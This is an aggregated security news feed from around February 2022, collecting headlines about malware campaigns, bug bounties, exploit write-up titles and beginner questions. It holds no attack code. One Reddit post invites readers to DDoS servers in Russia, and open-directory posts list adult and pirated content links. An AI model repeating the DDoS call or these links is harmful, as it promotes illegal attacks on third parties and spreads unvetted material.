    Switching careers into security. Hey everyone! So fairly new to the IT world; as the title says, I'm switching careers from being an executive chef for the past 16 years into cyber security. I'm starting a 6 month boot camp soon with GSU and afterwards I'll get my Sec+. I've been doing a lot of my own research by reading as much as I can, being active in a lot of different forums, and have already put 50+ hours on TryHackMe (which has been awesome), and I'm putting a lot of work into my home network! The goal is to try and get into a SOC position or something similar and skip the help desk; I'm hoping some of the leadership, team building and communication skills I learned being a chef can help me land these roles. Is there anything I can be doing in the meantime to further help myself? How does this plan sound? Any advice is super helpful!! submitted by /u/Immediate-Ad-8996
    I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server, any idea what is going on here?
    TL;DR: I'm getting POST requests from China, a Ukrainian data center, a TOR exit node, and others to my personal project server; I want to know more and don't know what to do. For some time now, I've been building a cryptocurrency trading bot, but I've left it aside for some time now, letting it collect data while I do other stuff. It will be there when I get back to it. Now that I am thinking of getting back to it, I decided to check in. So, I SSH into my home server, connect to the screen instance, and realize that I'm getting frequent (~1/min) POST requests from some IPs I don't recognize. Now, the only HTTP requests this app is supposed to make are GET requests to the exchange (Kraken) every 5 minutes, so something strange is going on here. In the console, I see multiple lines that l…
  • Open

    Open-source remote server management toolbox: UltimateShell
    Provides a large number of customizable features for penetration testers, programmers, webmasters, IT administrators and almost any user who needs to handle remote work in a simpler way.
  • Open

    Dancho Danchev's Sample Personal Conference and Event Photos - A Compilation
    Dear blog readers, I've decided to share with everyone a set of personal conference and event photos. Enjoy!
  • Open

    Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot
    An attack in early February targeted an energy organization in Ukraine with OutSteel and SaintBot. The attack is part of a larger campaign. The post Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot appeared first on Unit42.

  • Open

    Russian-manufactured armored vehicle vulnerability in urban combat (1997)
    Article URL: https://man.fas.org/dod-101/sys/land/row/rusav.htm Comments URL: https://news.ycombinator.com/item?id=30473688 Points: 52 # Comments: 49
    OpenVAS – Open Vulnerability Assessment Scanner
    Article URL: https://openvas.org/ Comments URL: https://news.ycombinator.com/item?id=30469493 Points: 1 # Comments: 0
    Termux Apps Vulnerability Disclosures
    Article URL: https://termux.org/general/2022/02/15/termux-apps-vulnerability-disclosures.html Comments URL: https://news.ycombinator.com/item?id=30468679 Points: 2 # Comments: 0
    CISA: Zabbix servers under attack with recently disclosed vulnerability
    Article URL: https://therecord.media/cisa-zabbix-servers-under-attack-with-recently-disclosed-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=30466266 Points: 5 # Comments: 0
  • Open

    Bug Bounty: My Work Schedule
    According to the 2020 H1 report: Continue reading on Medium »
    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    Booked your tickets for IWCON2022 yet? Continue reading on InfoSec Write-ups »
    Authentication Bypass in Admin Panel
    This is my second write-up about finding a bug in an admin panel and how I escalated the severity from Low to Critical Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CSRF (CROSS SITE REQUEST FORGERY) LAB SOLUTIONS
    CSRF (Cross-Site Request Forgery) allows an authenticated user to be made to perform unwanted actions on a web page… Continue reading on Medium »
    B̶a̶k̶e̶ Hack your cake!
    "If you can't bake a cake then hack the entire cake shop" — Vivek Coelho Continue reading on InfoSec Write-ups »
    10 ways to get RCE From LFI
    This illustrates multiple ways to upgrade your LFI to RCE Continue reading on Medium »
    Golden/Silver Ticket Attack | Kerberos | Active Directory |
    In this blog, we are going to talk about golden and silver ticket attacks. Continue reading on Medium »
    A Weird Price Tampering Vulnerability
    Well, Hello Pirates!!!!!!!!!!!!!!!!!!!!!!!!! Long Time No See :D Continue reading on Medium »
    Give me a browser, I'll give you a Shell
    A restricted browser, that's all you have… what do you do? Continue reading on Medium »
    Bypassing default visibility for newly-added email in Facebook (Part II - Trusted Contacts)
    After 3 months, I managed to bypass again the default visibility for newly-added email in Facebook. Here is the link to my first write-up… Continue reading on Medium »
  • Open

    Razzlekahn Part 1: Establishing Some Background.
    If you haven't seen my introduction to this case, please take a few minutes and check out Untangling the Razzlekahn Conspiracy: An OSINT… Continue reading on Medium »
    Untangling the Razzlekahn Conspiracy: An OSINT Perspective.
    Six years ago, 200,000 Bitcoin were stolen from the Bitfinex exchange. The coins remained largely untouched until 2017 when some of the… Continue reading on Medium »
    How to Set Up MISP (Malware Information Sharing Platform)
    MISP (Malware Information Sharing Platform) is a free, open source threat intelligence platform that can store, correlate, and share IoCs… Continue reading on Medium »
    Mosint
    What is mosint ? Continue reading on Medium »
  • Open

    How to Decrypt the Files Encrypted by the Hive Ransomware
    submitted by /u/CyberMasterV
    Pentest-tool: Simple and secure web deployment for pentest and redteam with simwigo
    submitted by /u/B1che
    BGP Security in 2021
    submitted by /u/danyork
    Catching bugs in VMware: Carbon Black Cloud Workload Appliance and vRealize Operations Manager
    submitted by /u/scopedsecurity
  • Open

    [AWC-Pune] - User can download files deleted by Admin using shortcuts
    Lark Technologies disclosed a bug submitted by prateek_thakare: https://hackerone.com/reports/1463028 - Bounty: $550
    [Android] Directory traversal leading to disclosure of auth tokens
    Slack disclosed a bug submitted by danielllewellyn: https://hackerone.com/reports/1378889 - Bounty: $3500
    Hackerone open redirect security alert bypass via view report as PDF
    HackerOne disclosed a bug submitted by iamr0000t: https://hackerone.com/reports/1386277 - Bounty: $500
  • Open

    Redteam-tool: Simple and secure web deployment for pentest and redteam with simwigo
    Simwigo is a cross-platform tool, written in Go, that allows you to quickly deploy a secure web service (with a nice and neat display :)). It was created to replace the use of tools such as SimpleHTTPServer and http.server from Python. It implements additional features allowing easy file exchange. It can be used for a pentest or a redteam, as well as for personal use. An API token authentication, a white list system, and the use of TLS (automatic deployment via Let's Encrypt) are integrated and increase the security of the service. Check out the latest release: https://github.com/8iche/simwigo/ submitted by /u/B1che
  • Open

    [Security Advisory] Clash For Windows remote code execution vulnerability
    Recently, a remote code execution vulnerability in the open-source proxy tool Clash For Windows was disclosed on GitHub. It is understood that the exploitation details and exploit code for this vulnerability have already been made public online, and it may already have been exploited in the wild.
  • Open

    Pentesting suite for Android suggestions
    Hey everyone, I am looking for a pentesting suite/app for Android, something similar to what cSploit and zANTI were back in 2014 - 2016, a quick solution to check for most of the basic vulnerabilities. I am aware of Kali NetHunter but I would like something closer to an app than a whole other operating system. Is anything like this still out there? I have been out of the Android community for the past 6 or so years. submitted by /u/ivaks1
    Does anyone think directory traversal/arbitrary file read is a super powerful vuln type?
    Let's just look at all the obvious uses for it: - auth bypassing/authorization bypassing - useful in RCE chains. Now let me explain why it's a powerful vuln class. Say you find one on the login page of a website; you now have pre-auth file read and, for example, could steal cached session cookies of an admin or crack a hash stored somewhere. This lets you escalate from a guest user all the way to super admin. Now let's say they patch this; in a lot of cases you can password spray a random user and find a post-auth file read, and now instead of an auth bypass it's more of an authorization bypass: now you're a normal user but can read admin areas and admin log files that may have juicy stuff. I've run into this scenario many times where they'll patch a pre-auth one but a post-auth one quickly gets found. Definitely one of my favorite vulns out there. submitted by /u/Academic-Discount252
    Are there any interesting flaws or attacks against SFUs or selective forwarding units? Would make for a novel bug bounty finding
    Most companies these days are moving towards SFUs from p2p, so it would be interesting to exploit low-level SFU implementations for RCE and maybe exploit the general logic of an SFU for IP disclosures etc. I haven't seen any research on SFUs. One interesting idea is forcing other clients to connect to you by claiming you're an SFU server; not even sure if that's possible but it would be interesting. submitted by /u/Academic-Discount252
    Reference for Snort/Suricata Flowbit Group Names
    I'm researching Snort "flowbit" group names (ex: http.dottedquadhost, userlogin, etc.). Yet, I cannot find any references that cover/explain the variety of group names that can be used. Does anyone know where I can find more information on how these group names are defined? submitted by /u/cyberphor
    Is this worth it?
    I'm reading up on zero trust and keep hearing about it, but I'm still trying to figure out what tools there are out there. I heard Cloudflare acquired Area 1 for zero trust, but has anyone heard of these guys? https://usenucleus.cloud/ submitted by /u/Ztsec
    Could it be real helpful for defending Ukraine from Russia?
    A few minutes ago, I checked the Twitter of Recorded Future and Greynoiseio. Both of them announced that they would apply full resources and capabilities to support Ukraine in their fight against Russia. Trying to find a sub that can answer this... seems reasonable from someone that knows little about the cyber world. So... is it really helpful for defending Ukraine against Russia? https://twitter.com/cahlberg/status/1496874932273389569 https://twitter.com/Andrew___Morris/status/1496923545712091139 submitted by /u/Late_Ice_9288
    Question for cybersec seniors
    Hi guys, I have to do a report for uni and gotta ask some questions to a senior in cybersec/infosec since I am starting my career and I'm a junior. The requirement is that I "interview" someone and I don't know anyone in real life; I hope it's okay. Thank you submitted by /u/Mokushi99
    What is the going rate for a zero day these days?
    Curious what the going rate for a zero day is on the black market, or even the legit market. submitted by /u/me_z
  • Open

    Less than 24 Hours Left For Infosec Writeups Virtual Cybersecurity Conference
    No content preview
  • Open

    Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints
    Introduction Will Schroeder and Lee Christensen wrote a research paper on this technique which can be referred to here. In ESC8 technique mentioned in the research The post Domain Escalation: PetitPotam NTLM Relay to ADCS Endpoints appeared first on Hacking Articles.
  • Open

    Invoke-EDRChecker: a powerful host security product detection tool
    This tool performs detailed security checks on running processes, including process metadata, the DLLs loaded into the current process, and each DLL's metadata.
    Exploring the construction of data-centric data security foundational capabilities
    Starting from a data-centric philosophy, this article reviews data identification, classification and grading, and basic protection, with functional demonstrations built on open-source software.
    FreeBuf Morning Report | Hundreds of millions of Samsung phones exposed to a serious encryption flaw; Ukraine recruits hackers to defend against Russian cyberattacks
    Due to large-scale distributed denial-of-service (DDoS) attacks, multiple Ukrainian government websites went offline on Wednesday.
    Two Zabbix vulnerabilities added to CISA's Known Exploited Vulnerabilities list
    The US Cybersecurity and Infrastructure Security Agency (CISA) has added two Zabbix vulnerabilities to its Known Exploited Vulnerabilities catalog.
    FreeBuf enterprise group discussion | Talking about corporate security budgets in a complex climate
    The Personal Information Protection Law, the Data Security Law, the log4 outbreak: what impact will the frequent developments in the security community over the past year have on corporate security budgets this year?
    "Cloned" games containing the Electron Bot malware appear in the Microsoft Store
    By cloning popular games such as Subway Surfers and Temple Run, Electron Bot has infiltrated the Microsoft Store.
    During the Russia-Ukraine war, the US warns to watch out for MuddyWater stirring up trouble amid the chaos
    The US and UK issued a warning that a hacker group confirmed to be backed by the Iranian state is conducting digital attacks and other malicious activity against global targets during the Russia-Ukraine war.
    Microsoft Exchange servers hacked to deploy Cuba ransomware
    The Cuba ransomware is exploiting Microsoft Exchange vulnerabilities to gain entry to corporate networks and encrypt devices.
    Step by step to a thousand miles: white hat 积木's bug hunting journey
    Nearly 4 years, from newbie to MVP: a bug hunting journey.
    Research finds adult content in the metaverse is accessible to underage users
    According to a recent BBC investigation, children can access sexual content through the metaverse.
    Insufficiently protected Microsoft SQL databases are becoming hacker targets
    Recent data shows that hackers are installing Cobalt Strike beacons in vulnerable Microsoft SQL databases to gain a foothold in target networks.
    Breaking! Global hacker groups launch a "cyber war" against Russia
    War makes people cherish hard-won peace even more: we never cheer for war, but we are not afraid of it either.
    How to use PHP Malware Finder to detect potentially malicious PHP files on a host
    PHP Malware Finder is a powerful detection tool for host security and PHP security; researchers can easily detect potentially malicious PHP files that may exist on their hosts or servers.
    FreeBuf Weekly | Monzo digital bank users targeted by phishing; Meyer discloses cyberattack affecting employees
    Happy weekend, FreeBufers~ Here is this week's "FreeBuf Weekly", in which we summarize and recommend this week's hot news, quality articles and handy tools, making sure you don't miss any of this week's highlights! Hot news: 1. The White House pins the Ukraine DDoS attacks on Russian GRU hackers 2. UK Monzo digital bank users targeted by phishing 3. Dozens of OpenSea users' NFTs stolen, losses exceed $1.7 million 4. Getting rich, defecting, being hunted down… the Conti ransomware group's surreal 2021 5. Phishing emails like this
    Ukrainian government and financial institutions hit by suspected Russian hackers
    This malware was deployed on hundreds of devices on Ukrainian networks.
  • Open

    SecWiki News 2022-02-25 Review
    SecCrawler: a crawler and push program for daily security reports by ourren; cheatsheet: an information security technology scroll by ourren; Code analysis and automated refactoring by ourren; A practical guide to enterprise security intelligence by ourren; An automated detection tool for cookie consent and GDPR violations by ourren; CodeQL meets Shiro550 by ourren; TP-Link WR740 router backdoor vulnerability by ourren; Parallels Desktop virtual machine escape by ourren; Introduction to k8s security by ourren; for more of the latest articles, visit SecWiki
  • Open

    CEH Practical Review/Guide — How to prepare and ace your exam in the first attempt
    My journey for CEH practical exam started when I applied for the scholarship sponsored by the EC-Council. The actual exam cost was 550$… Continue reading on Medium »


    CVE-2022-23835: A security analysis of Visual Voicemail
    Article URL: https://gitlab.com/kop316/vvm-disclosure Comments URL: https://news.ycombinator.com/item?id=30461939 Points: 2 # Comments: 0

    HermeticWiper: What We Know About New Malware Targeting Ukrainian Infrastructure (Thus Far)
    submitted by /u/jat0369
    A Detailed Analysis of the LockBit Ransomware
    submitted by /u/CyberMasterV
    Understanding Threat Actors by @berkdusunur
    submitted by /u/EyeAccomplished5529
    The Bvp47 - a Top-tier Backdoor of US NSA Equation Group
    submitted by /u/eberkut
    Logic Flaw Leading to RCE in Dynamicweb 9.5.0 - 9.12.7
    submitted by /u/Mempodipper

    Curious
    Out of curiosity, are my chances good to land a junior infosec job, SOC analyst, or sysadmin position based on my work experience? It's not a lot and I am new to the IT field, but to sum it all up, the only work experience I have is when I was a Geek Squad agent at Best Buy, when I worked at a call center, and most recently I got a job as a junior help desk technician. I also have 0 certs, by the way, and I'm too lazy to send in my actual resume hahaha. submitted by /u/Jkarl0880
    Doubt on Session Cookies
    Hi, I am exploring Burp Suite and HTTP requests. I was convinced that a cookie was only set after login. I tried to intercept a (failed) login on a simple web form and I got this:

        POST / HTTP/1.1
        Host: markup.htb
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 32
        Origin: http://markup.htb
        Connection: close
        Referer: http://markup.htb/
        Cookie: PHPSESSID=33foj37c9f8tburjbdufbtu8ln
        Upgrade-Insecure-Requests: 1

        username=test&password=test

    I noticed that the Cookie header is already present, even before my request can reach the webserver. Can someone enlighten me on this? Thank you!! submitted by /u/g-simon
    I found a major security flaw in the Lens.com website, need advice on how to proceed
    I apologize if this is the wrong place to ask this question, but here goes. Without getting into details, I found a way to access a user account without permission. I submitted it to kb.cert.org (didn't know where else to submit it), but they said they don't handle issues with live websites. I also informed Lens.com, but honestly they didn't seem to care and have since ghosted me. I don't want to release the details and risk the (I can only assume) 7 people who still use that terrible site, but I'm not sure how else to bring enough attention to this to get them to fix it. Any advice? Thanks. submitted by /u/AngryHumanoid
    Providing SSN over voicemail for employer to access fingerprinting results? Is it safe? Says she will delete the voicemail when her meeting ends.
    I got fingerprinted for a background check (I'm working in education, at a private school) and have to tell my SSN to my employer so they can log in to the database to check the fingerprint results before I start. I'm not comfortable providing my SSN over email, and one of my employers told me that was okay and I could give the employee in charge of it a call. I emailed the employee and she told me that she will be in a meeting until the day ends and asked if I could leave my SSN through voicemail; she will delete the message once the meeting is over and will run the SSN through the database. She told me she couldn't do tomorrow since she was leaving the country, and I need to give it before Monday, the day I start, to have the results checked. Is this safe, to leave a voicemail with my SSN, since she will delete it afterwards? It seems to be my only option. Or should I just forget this job altogether if this is my only choice, or request someone else who is available to do it with? I think she is the only one..... Update: I decided to do it since time was ticking, since I start Monday and the employer is off to another country tomorrow so I won't be able to connect with her, which I find very weird. Did I put myself at risk?? Probably. Did I feel immediate regret after doing it? Yes I did. Nervous as heck, I hope I will be fine after this. submitted by /u/lostspirit10
    RSA NetWitness
    Hi guys, I recently started working as QA in NW and wanted to check what folks in the field actually think of it. Have you ever tried or had hands-on with RSA NetWitness SIEM? Any feedback on UX, threat hunting, correlation capabilities etc.? Thanks! submitted by /u/Peanutbutter-0
    Is this tool worth it?
    I've been following these guys for quite some time now, since a friend of mine working at a large insurance company told me they use the platform internally. But I'm still not sure whether it is worth it. A few days ago, they announced they went open-source; I gave it a try and it looks cool. I ran a network scan with multiple tools at the same time (nmap, tsunami, nuclei) and got back a full report with just a few commands. The thing is, I am still confused on the difference between the open source and the paid version. Have you tried the platform before? Do you think it is worth the money? submitted by /u/deadlyhayena
    Anyone know the difference between BGP and DNS communication?
    Hi guys, I'm a student in a software engineering major. These days I'm interested in RPKI hijacking. I saw the news that because of BGP hijacking, cryptocurrency is now in danger. As far as I know, RPKI is the certificate of the router, and without RPKI the risk of BGP hijacking is more dangerous. But I can't understand the difference between BGP and DNS communication. Of course I did search on Google, but it is too deep for me to understand. Please teach me the difference between BGP and DNS communication easily... (to the point where newbies can understand). submitted by /u/Late_Ice_9288
    Vulnerable?
    Hi guys, how do I find out whether my own IP address is vulnerable atm? submitted by /u/alicia30765

    How I Found a Single-Click Open Redirect at Xiaomi (Arabic)
    Single click open redirect. Peace be upon you. Today I'm writing to you about how I found a vulnerability
    How I Hacked the Dutch Government with SQLi and Won the Famous T-Shirt
    Hello, those who are at the computer day and night.
    Take part in our Bug Bounty Program
    As you well know, Avacash.Finance is a fork of Tornado.cash on the Avalanche blockchain, which means that we offer a fully decentralized…
    Mars Protocol offers up to $1 million payout in bug bounty program with Immunefi
    More than 20 contributors from around the world have spent nearly a year developing Mars from scratch in the Rust programming language…
    $$$ Bank Verification Bypass (Broken Object Level Authorisation)
    Hey Readers 👋, hope you are doing great,

    ODs/Calibre servers from Russia
    In solidarity with the Ukrainian people, after the cyber attack of the Russian government against Ukrainian digital assets to prepare their invasion, you're friendly invited to attack these servers located in Russia unto DDOS. Help us to complete this list of ODs and Calibre servers. I hope the Russians love their children too! Slava Ukraine! submitted by /u/krazybug
    Diff links to other places, funny music etc...
    Ok, went for a wander and here are a few findings. Not claiming they are all new, but just what I found on a rabbit-hole day... https://www.pyrocam.com/files/Video/funny/ next... http://stephenleblanc.com/backup/stephen/projects/Alex%20recovered/BlackBerry/music/Media%20Sync/ next... http://ftp.dyslexicfish.net/music/ next http://mediamusic-journal.com/video/ next https://www.creativebone.co.uk/video next... http://projects.csail.mit.edu/video/history/robotics/ Cannabis stuff plus other... https://www.thevespiary.org/library/Files_Uploaded_by_Users/llamabox/ Sounds, language stuff... http://211.110.1.18/Suda_Data/ Cooking http://www.medigaplife.com/videos/recipes/ Funnies, old but still funny, gif, jpg etc... http://www.brainbox.cc/funny/ Memes, what was relevant then... http://www.mercilesstruth.com/memes/ Funny, yep just funny, some old chan stuff, vids etc... http://tajgoren.net/bildarkiv/Download/ http://tajgoren.net/bildarkiv/Download/Funny/ Well, movies, music-ish, just stuff... https://johnbot.org/Share/ Lots of images. Stay out of the folder WTF... http://148.72.150.188/archive/access/images/ Images, funny-ish; do not watch 'SickBoobie Choumi.wmv' http://www.amickracing.com/misc/ Funny, music, MP4s and lots more... http://www.aircam6600.com/1/mp4/ Ok, well done if you got through them. You saw the hidden link...;0) submitted by /u/xanderTgreat
    Just a few xxx links for now...
    Lots of xxx movies https://artserotica.com/videos/ Been posted before but still up http://salepute.fr Short JAV, I think, some pixelated... https://www.xxxx-videos.com As above... https://kijyoui-douga.com/wp-content/uploads/2017/07/?SD JAV as above http://javichuparadise.com/wp-content/videos/ Not sure if this meets the open directories guides... http://www.wo-fd.xyz/?/ Lots of images with a few vids... http://real-uksex.com/wp-content/uploads/ Lots of MP4s http://24.138.249.6/Peliculas/Adultos/ What it says in the link: Mandy Flores porn life images... https://mandyflores.com/content/ Bit of good old BDSM http://213.32.1.25 submitted by /u/xanderTgreat

    The Top-Notch Red Team Penetration Testing Services in Israel, USA, UK

    Dispatch From The Digital Fringes (01.022022)
    Welcome to our launch here on Medium! I'm Matt Schultz — former Digital Archivist, Curator & Preservationist. I'm so excited to be…
    The ultimate guide to threat intelligence for corporate security
    This definitive guide to threat intelligence provides everything you need to know about implementing and using threat intelligence within…

    SecWiki News 2022-02-24 Review
    Abusing ESC7 in AD CS (by ourren)
    Three precise definitions of threat intelligence (by ourren)
    Leveraging machine learning to find security vulnerabilities (by ourren)
    Research report on the current state of behavioral security in the mobile app supply chain (SDKs) (by ourren)
    A BERT-based method for measuring web service policy compliance (by ourren)
    LastPyMile - identifying differences between a software package's source code and its released code (by ourren)
    A summary of machine-learning security datasets (by ourren)
    How does Xloader perform encrypted C&C communication? (by Avenger)
    For more of the latest articles, visit SecWiki.

    SockDetour – a Silent, Fileless, Socketless Backdoor – Targets U.S. Defense Contractors
    SockDetour is a custom backdoor being used to maintain persistence, designed to serve as a backup backdoor in case the primary one is removed.

    Zero-day XSS vulnerability in Horde webmail client can be triggered by file preview function
    Article URL: https://portswigger.net/daily-swig/lt-p-gt-zero-day-xss-vulnerability-in-horde-webmail-client-can-be-triggered-by-file-preview-function-lt-p-gt Comments URL: https://news.ycombinator.com/item?id=30453652 Points: 2 # Comments: 0

    After leaving a job, would you access your former company's accounts?
    A sound offboarding process reduces the harm departing employees can do to a former employer.
    FreeBuf Morning Report | US receives ransomware warning; hundreds of computers in Ukraine hit by wiper malware
    A Nigerian national admitted in the District Court for the Southern District of New York to breaking into a company's accounts and stealing payroll deposits.
    Russia's blitz on Ukraine: the cyber war had already begun
    The Russia-Ukraine conflict has been brewing for a long time.
    Social media attacks set another record in 2021, with financial security still at the top of the list
    Social media has become one of the channels hackers use to distribute threats, and attacks through this channel rose twofold over the course of 2021.
    Ransomware extortion does not stop after the ransom is paid
    A global survey of ransomware victims' experiences highlights the untrustworthiness of ransomware actors: in most cases where the ransom was paid, the extortion continued.
    March 11, 7 pm | How to build asset identification capability under the new security infrastructure
    At 19:00 on Friday, March 11, A Ke, senior security expert in Alibaba Group's security department, will give a public lecture titled "How to build asset identification capability under the new security infrastructure".
    ASUS subsidiary ASUSTOR attacked, held to ransom for over ten million yuan
    The ransomware attack affected many users worldwide and sparked widespread discussion on the ASUSTOR forums.
    Operations and management of data center infrastructure
    To standardize the operation and maintenance of data center infrastructure, enterprises and public institutions should refer to the relevant national standards to establish O&M management systems, policies and procedures that keep IT services running securely, stably and normally.
    Using credential stuffing, a Nigerian hacker pocketed other people's wages
    Starting in July 2017, the attacker compromised a total of 5,500 user accounts and transferred $800,000 in all.
    Security, season one - [No matter is too small: security first]
    A virus is a program that covertly infects a computer system and causes damage. Virus code hides in other programs, the hard disk partition table or the boot sector, waiting for its moment
    Microsoft insight: identity management weaknesses have become the top threat to digital security
    Over the past two years, the pandemic-driven new normal has accelerated digital transformation worldwide, and digital capability has become a core capability for the survival and growth of businesses and individuals.
    Cybercrime case analysis - illegally obtaining app data (42)
    Illegally obtaining app data for personal gain constituted the crime of illegally obtaining computer information system data, punished with four years and six months of imprisonment.
    No visibility, no security! Ten foreign SASE vendors worth watching (2022 edition)
    Traditional network security measures will not be able to cope with complex network architectures; improving network visibility will be an important trend in future network defense technology.
    Daiwa Securities (China) is hiring! An information security management position awaits your application
    Daiwa Securities (China) Co., Ltd. is a newly established foreign-controlled securities company based in Beijing, China.

    Introduction to Fuzzing in Go
    Release 1.18 will add support for fuzzing.

    TP-Link WR740 router backdoor vulnerability
    Author: IOTsec-Zone. Original link: https://mp.weixin.qq.com/s/SWFLV6H1zKWQyvnC0JGGhg 0x00 Description. Test environment: Ubuntu 18.04. Firmware version: wr740nv1_en_3_12_4_up(100910).bin. Vendor: TP-Link. Vendor site: https://www.tp-link.com.cn/ ZoomEye search app:TP...
    CodeQL meets Shiro550
    Author: SummerSec. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted piece earns a gift! Submission email: paper@seebug.org. JDK built-ins: As mentioned above, the search in JDK8u found a total of 7 classes that can replace the ComparableComparator class, but only two of them can be instantiated and called directly, String#CASE_INSENSITIVE_ORDER and AttrCompare; the other 5 classes' access modifiers...

    [NSFW] Pornographic Images
    Public nudity - enjoy https://public.flashingjungle.com/exhibitionism/ submitted by /u/-Phinet-
    DorkSearch is a tool that gives you a list of prebuilt templates for Google Dorks for different use cases.
    submitted by /u/pentestscribble
    Hollywood Movies 1900-2020 - If download is slow, cancel and try again after 30 seconds.
    submitted by /u/SatansMoisture
    Bit more porn...
    This site I have already ripped and made into a torrent, but it's still up... itaporno. Remember to use a VPN if you rip it... submitted by /u/xanderTgreat

    Looking for a Place to Find the Latest Computer Forensic Case News
    I'm currently enrolled in a Digital Forensics class and have to do a project where we give a presentation on a current technology or case in digital forensics. Does anybody know of a good way to find these articles, like what to put in the search bar or which websites are best to check out? submitted by /u/Mattdarkninja
    Windows 10 reset artifacts
    Can someone help me find traces of artifacts left on a Windows 10 machine which was reset 5 months ago and repurposed for another user? Reference material on finding Windows 10 reset and refresh artifacts would be very useful. Also, suggestions on any tool that can be used to recover data. submitted by /u/Pepperknowsitall
    Putting the user behind the keyboard/knowledge
    If files are found automatically synced to a computer, with no evidence that the suspect had knowledge of them (folder never opened, file never viewed)… and the file was not downloaded by any deliberate action, and it cannot be determined who uploaded them in the first place or the device used to do so, is it enough to make a case based on the name on the account when multiple individuals reside at the place? submitted by /u/Complete-Cockroach80
    Newcomer to the field
    If this post is against the rules in any way, I apologize; please take it down. Greetings everyone. I graduated last year with my bachelor's in digital forensics and decided to stay in my country for a while and try to get a job here (Puerto Rico). Sadly I have not, and am considering moving to the US to get a job there. Any advice? Sites to search for job offers in this area for graduates? States I should stay away from because of high cost of living? Any help I would appreciate greatly. submitted by /u/andrew9514

    Automating bug bounties
    submitted by /u/pedro_benteveo
    The vulnerability research team @GitLab is introducing an open-source community-driven advisory database for third-party security dependencies
    submitted by /u/howie1001
    Remote Code Execution in pfSense <= 2.5.2
    submitted by /u/smaury
    tmp.0ut Volume 2
    submitted by /u/VVX7
    You can still CSRF POST requests under the default browser SameSite cookie policy. How to jump through the required hoops.
    submitted by /u/MysteriousHotel3017
    Cyrus SASL 2.1.28 has been released with SCRAM improvements and CVE fixes
    submitted by /u/Neustradamus

    Bug Bounty: Do You Need To Be A Programmer?
    Disclaimer: we are talking about the research of web applications only.
    Beginner Bug Bounty Journey
    Introduction
    What You can Learn from Coinbase Hack with USD250k Bounty
    As a bug bounty hunter, you may experience something like below:
    How to hunt for bug bounties
    The first step when looking for bug bounties is to get to know the target.
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Never attended a virtual networking event before? Your FAQs answered + Check our live demo here.

    How to use satellite imagery to visualise changes in landscapes
    And how those changes can help you chronolocate an event.
    Geolocating TikTok videos of Russian military vehicles near Ukraine
    A little persistence can help pinpoint locations
    Bus and Rocks — OSINT Challenge 19 and 20
    Quiztime (contributors @kollege and @mahrko) shared two OSINT quizzes with us. Both objects were kind of weird. For kollege's we have to…

    Pentesting a Windows box
    Hello everyone! Just a question: how do you start a Windows box? I have been doing some HTB these past few weeks and only testing the Linux boxes; now, how did you guys learn to pentest a Windows box? (I don't have any background in Active Directory stuff.) Thank you! submitted by /u/pldc_bulok
    Implications of a disabled, factory install of Facebook on an Android device.
    I do not use Facebook, but it came pre-installed on my phone. I can't uninstall it because Zuck owns my phone, but I have disabled the app and reverted it to the original factory install. I'm concerned about having an extremely out-of-date version remaining, probably rife with security flaws. Does disabling the app effectively lock it out from receiving or transmitting? submitted by /u/spinfip
    Email compromised, address spoofed, or elaborate phishing email?
    Not sure if this is the best subreddit to ask about this. Let me know if there's a better subreddit for this post. My email account has a unique, very strong password and two-factor authentication. This morning, I noticed in my junk folder there was one of those "failed to deliver" emails meant for another address, like those undeliverable emails you get when you try to email an address that doesn't exist and it bounces back to you. Interestingly, it came from another domain instead of postmaster@outlook. I never sent this email, I don't see an email like it in Sent, and I don't see anything unusual in Drafts or Sent. I checked the account's login activity and there were no sign-ins, only failed attempts to sign into the account from Asia. I have 2FA enabled, so I should've been notified if anyone had attempted to sign into the email account, either today or previously at any point other than when I myself signed in. Furthermore, the bounce-back email had my address as the sender, but the contact name on it was just random letters, not the name I have on my account. Is my email compromised, did someone spoof the address, or is this an elaborate phishing attempt that I'm BCC'd on? submitted by /u/NotMSUPD
    PluralSight Subscription Expiring, Any Others We Should Look Into Instead?
    After being unemployed for 2 years (stay-at-home dad) I wanted to rejoin the workforce but wanted to move past helpdesk/desktop level (had 5 yrs exp) and decided cybersecurity was the way to go. I did not have a tech degree, or any other certs, and was always a poor student, but I studied my butt off for 2 months and got my Sec+ and a month later landed the dream job making the big bucks!!! aka INFOSEC-focused sysadmin. Our PluralSight subscription is expiring and before I blow my budget on it and renew it, I wanted to know if there are any others I should be looking into instead? This would be for a team of 2-4 individuals. Ideally looking for an all-around system, with the focus on Cloud, INFOSEC, and SCCM. In my current duties I touch everything: SCCM, AWS, Azure, GCP, VMware, Citrix, C…
    Using Quantitative Risk Metrics to get C-suite buy-in?
    When I did my Master's we did a great section on quantitative vs qualitative risk management that I really want to implement. The logic to me seems sound, in that the value of asset x should inform the costs you are willing to incur to mitigate risks. Getting away from vague "I feel" statements about cyber risk to quantitatively say asset x is worth y to the company, so investing w to reduce risk is basic math the C-suite can get. My barriers to this are: getting an effective asset valuation, as no one seems to track initial investment and sustainment costs, let alone cyber security costs; and building this into SOP when tagging assets. Tagging right now is limited, so this needs to be fixed too. Has anyone here effectively put quantitative risk into practice and can share what worked? submitted by /u/finnthethird
    What's the deal with IP addresses?
    I know this is such fundamental basic stuff, but why is this thing so crucial? submitted by /u/alicia30765

    Bolt from HackTheBox — Detailed Walkthrough
    Nibbles From HackTheBox
    2 Days Left for IWCON 2022 Virtual Infosec Conference & Networking Event
    Intercepting Android Emulator SSL traffic with burp using magisk
    [THM] Ignite Writeup
    Mobile phone number verification bypass

    Bash Tricks for Command Execution and Data Extraction over HTTP/S
    submitted by /u/cyberbutler
    What’s Next in Microsoft Sentinel?
    submitted by /u/SCI_Rusher

